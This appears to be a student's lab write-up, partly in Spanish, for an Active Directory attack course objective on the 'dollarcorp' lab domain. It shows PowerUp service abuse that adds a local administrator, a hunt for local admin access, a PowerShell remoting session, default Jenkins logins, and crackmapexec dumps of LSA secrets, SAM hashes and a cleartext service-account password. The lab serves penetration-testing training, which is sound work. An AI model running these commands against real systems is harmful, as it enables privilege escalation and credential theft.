Learning Objective - 5

5. Service abused on the student VM for local privilege escalation

PS C:\AD\Tools> Import-Module .\PowerUp.ps1
PS C:\AD\Tools> Get-ServiceUnquoted -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

PS C:\AD\Tools> Get-ModifiableServiceFile -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True

PS C:\AD\Tools> Get-ModifiableService -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
VERBOSE: Current user has 'ChangeConfig' for AbyssWebServer
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True

Respuesta:

AbyssWebServer

Explotacion

[*] Checking service permissions...


ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'SNMPTRAP'
WARNING: Waiting for service 'SNMP Trap (SNMPTRAP)' to stop...

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add


PS C:\AD\Tools> net users

User accounts for \\DCORP-STD723

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
john                     WDAGUtilityAccount
The command completed successfully.

Iniciamos una cmd como administrador.

Y luego agregamos nuestro usuario como administrador local.

C:\Windows\system32>net localgroup Administrators dcorp\student723 /add
The command completed successfully.


C:\Windows\system32>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dcorp\Domain Admins
dcorp\student723
john
The command completed successfully.

Script utilizado para buscar privilegios de administrador utilizando PowerShell Remoting

Primer intento

PS C:\AD\Tools> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Fallido.

Segundo intento:

PS C:\AD\Tools> Get-NetComputer | select samaccountname

samaccountname
--------------
DCORP-DC$
DCORP-ADMINSRV$
DCORP-APPSRV$
DCORP-CI$
DCORP-MGMT$
DCORP-MSSQL$
DCORP-SQL1$
DCORP-STDADMIN$
DCORP-STD721$
DCORP-STD722$
DCORP-STD724$
DCORP-STD723$
DCORP-STD726$
DCORP-STD729$
DCORP-STD725$
DCORP-STD728$
DCORP-STD727$
DCORP-STD731$
DCORP-STD732$
DCORP-STD730$
DCORP-STD733$
DCORP-STD735$
DCORP-STD734$
DCORP-STD736$
DCORP-STD737$
DCORP-STD739$
DCORP-STD740$
DCORP-STD738$
PS C:\AD\Tools> .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt

Fallido.

Tercer intento:

PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-std723
dcorp-adminsrv

PS C:\AD\Tools> nslookup dcorp-adminsrv
Server:  UnKnown
Address:  172.16.2.1

Name:    dcorp-adminsrv.dollarcorp.moneycorp.local
Address:  172.16.4.101
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv -Credential dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> ls
[dcorp-adminsrv]: PS C:\Users\student723\Documents> cd ..
[dcorp-adminsrv]: PS C:\Users\student723> cd /
[dcorp-adminsrv]: PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/11/2022  12:55 AM                Program Files
d-----          5/8/2021   2:34 AM                Program Files (x86)
d-----         12/3/2023   6:36 AM                Transcripts
d-r---         2/20/2024   4:42 PM                Users
d-----         1/10/2024   1:05 AM                Windows

Jenkins user used to access Jenkins web console

http://172.16.3.11:8080/

manager:manager
builduser:builduser

Link: http://172.16.3.11:8080/job/Project0/configure

Luego obtenemos el resultado:

Respuesta:

builduser

Domain user used for running Jenkins service on dcorp-ci

Respuesta:

dcorp\ciadmin

Plus

crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --lsa
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping LSA secrets
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes256-cts-hmac-sha1-96:8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes128-cts-hmac-sha1-96:00527bdd009fedf4f9e116f7270fd8be
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:des-cbc-md5:d08a1a1fabdfc789
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:plain_password_hex:360056003d002b004c002600470051004e0055003b00220061007500280056004f00390025006a0071003c005f005e003d004600600033004a0071004d0043002200500021005100300068006f005b00490071005b002800430075006d005d007200530025006a004b004b00280023002d005d0064002d006800720049003c006e0042003600760056006f00220044004c00670045007700450059003a002a006300600051003e00600033003e005200430075006e002f0033005e0024007200630034004e002800650045006b0022002400570045007400770071005a0068005b00380026002f004b0048005c007400
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.3.11     445    DCORP-CI         dpapi_machinekey:0x4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:0xeba6b8fb6245f03382bff91e8fb6fd323080b80c
SMB         172.16.3.11     445    DCORP-CI         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.3.11     445    DCORP-CI         dcorp\ciadmin:*ContinuousIntrusion123
SMB         172.16.3.11     445    DCORP-CI         [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.secrets and /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.cached

crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --sam
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping SAM hashes
SMB         172.16.3.11     445    DCORP-CI         Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2:::
SMB         172.16.3.11     445    DCORP-CI         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         [+] Added 4 SAM hashes to the database
PreviousLabsNextLearning Objective - 6

Last updated